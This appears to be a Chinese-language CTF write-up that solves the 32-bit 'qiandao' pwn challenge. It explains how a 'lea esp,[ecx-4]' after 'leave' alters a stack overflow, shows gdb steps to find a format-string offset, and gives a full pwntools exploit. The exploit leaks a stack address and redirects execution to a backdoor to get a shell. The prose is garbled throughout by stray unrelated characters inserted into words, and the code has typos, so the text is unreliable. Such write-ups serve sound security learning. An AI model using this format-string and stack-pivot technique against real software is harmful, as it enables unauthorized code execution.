總結(jié)分析
這道題是一道簡單的棧溢出漏洞尸疆,但是在leave指令后颗味,利用lea指令給esp賦值別的地址遮婶,導(dǎo)致我們覆蓋到返回地址的地址不能被跳轉(zhuǎn)儒恋。
考點(diǎn):
棧溢出
格式化字符串漏洞
0x1
第一步先查看一下保護(hù)機(jī)制和多少位的程序
checksec? ./qiandao
32位程序只有NX保護(hù)扔進(jìn)IDA觀察
簡單分析
1.main函數(shù)的最后有一個(gè)將ebp轉(zhuǎn)為esp的代碼,如果你棧溢出破壞了ebp黄刚,會(huì)導(dǎo)致[ecx-4]報(bào)錯(cuò)捎谨。
2.leave以后會(huì)修改esp為ecx-4例隆,而ecx的值為ebp-4地址上的值读存。也就是:esp=[ebp-4]-4。
3.因此我們首先需要利用格式化字符漏洞泄漏棧地址剂跟,然后修改ebp-4為我們可控的地址业扒,并且修改該地址-4處的值為backdoor检吆,我們就可以獲得shell了。
詳細(xì)分析
大概了解一下函數(shù)返回時(shí)leave程储、ret蹭沛、lea、mov四條指令的本質(zhì)
1.leave指令相當(dāng)于mov esp,ebp; pop ebp;即恢復(fù)上一個(gè)函數(shù)的棧結(jié)構(gòu)
2.ret指令則相當(dāng)于pop esp;也就是在ebp出棧之后虱肄,esp其實(shí)是指向返回地址的致板,就會(huì)將當(dāng)前棧頂內(nèi)容彈出到eip中進(jìn)行執(zhí)行
3.lea是load effective address的縮寫,簡單的說咏窿,lea指令可以用來將一個(gè)內(nèi)存地址直接賦給目的操作數(shù)斟或,例如:lea eax,[ebx+8]就是將ebx+8這個(gè)值直接賦給eax,而不是把ebx+8處的內(nèi)存地址里的數(shù)據(jù)賦給eax集嵌。
4.而mov指令則恰恰相反萝挤,例如:mov eax,[ebx+8]則是把內(nèi)存地址為ebx+8處的數(shù)據(jù)賦給eax。
再看一下這道題目中函數(shù)調(diào)用結(jié)束的指令:
在leave和ret之間執(zhí)行了lea esp,[ecx-4]也就是將esp指向了ecx-4這個(gè)地址根欧,我們看到前面的mov ecx,[ebp+var_4]得知了ecx存放的是ebp+var_4地址上的內(nèi)容怜珍,而var_4是棧上比ebp低四字節(jié)的位置:也就是說esp=[ebp-4]-4。
思路總結(jié)
1.格式化字符串泄露棧地址
2.利用gets修改ebp-4的值為可控地址
3.修改可控地址-4處的值為backdoor
0x2
格式化字符漏洞泄露棧地址
在printf下斷點(diǎn)/進(jìn)行調(diào)試
gdb -q ./qiandao
b printf
r
bbbb
x/20wx 0xffffd040
通過打印0xffffd040處的內(nèi)容的凤粗,發(fā)現(xiàn)了棧偏移為2
0x3
exp如下
from pwn import *
p = process('./qiandao')
#p = remote('ip',port)
back_addr = 0x0804857d
payload_1 = '%2$p'
p.recvuntil("name:")
p.sendline(payload_1)
p.recvuntil('0x')
stack_ebp = int(p.recv(8),16)
#prinf srack_ebp
stack_ecx = stack_ebp - 4?
p.recvuntil("problem?")
payload_2 = 'a'*32 + p32(back_addr) + p32(stack_ecx)
p.sendline(payload_2)
p.interactive()
0x4
總結(jié)一下心里感受:南上加南酥泛。
推薦其他師傅的wp
此篇文章如果存在問題,還望大佬批評(píng)指正
